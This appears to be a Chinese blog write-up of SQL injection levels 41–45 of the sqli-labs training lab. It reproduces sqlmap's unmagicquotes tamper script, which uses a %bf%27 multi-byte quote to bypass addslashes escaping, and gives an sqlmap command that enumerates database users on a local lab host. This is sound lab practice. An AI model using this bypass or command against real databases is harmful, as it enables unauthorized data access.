SQLMAP脚本-sql-labs-Less-41-45

首先忘记说unmagicquotes.py的写法了,真变成为了使用脚本而使用脚本了...

#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces quote character (') with a multi-byte combo %BF%27 together with generic comment at the end (to make it work)

    Notes:
        * Useful for bypassing magic_quotes/addslashes feature

    Reference:
        * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string

    >>> tamper("1' AND 1=1")
    '1%bf%27-- -'
    """

    retVal = payload

    if payload:#先判断payload是否存在
        found = False
        retVal = ""

        for i in xrange(len(payload)):#循环payload长度
            if payload[i] == '\'' and not found:#当检测到第一个\'就是第一个单引号的时候将%bf%27放到retVal的下一位并且设置found为True让该判断无法进入,将剩下的payload都加入retVal
                retVal += "%bf%27"
                found = True
            else:
                retVal += payload[i]
                continue

        if found: #如果found被设置为了True 说明payload被替换将进入该语句块
            _ = re.sub(r"(?i)\s*(AND|OR)[\s(]+([^\s]+)\s*(=|LIKE)\s*\2", "", retVal)#过滤出正确的payloadsql注入语句
            if _ != retVal: #如果不等于也加....
                retVal = _
                retVal += "-- -"
            elif not any(_ in retVal for _ in ('#', '--', '/*')): #如果# -- /*都不在该payload中就给后面加上-- -
                retVal += "-- -"
    return retVal

可以看到简单的,就是判断检测分割添加%bf%27



Less-41

 这关也是无报错其余和40关一样直接跑就好了
python3 ./sqlmap.py "http://192.168.0.101/2022.10.26/sqli-labs-master/Less-41/?id=1"  --technique=U --users --tamper=air.py --level=2


Less-42

 就堆叠注入,注入点换成了post参数而已,就以后在更新怎么用脚本吧现在没时间
Less-43

 基于报错的堆叠注入也差不多
Less-44

闭合方式改变

                                                              Less-45
                                 关闭了报错其他的跟43一样....和着今天就摸鱼了...

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值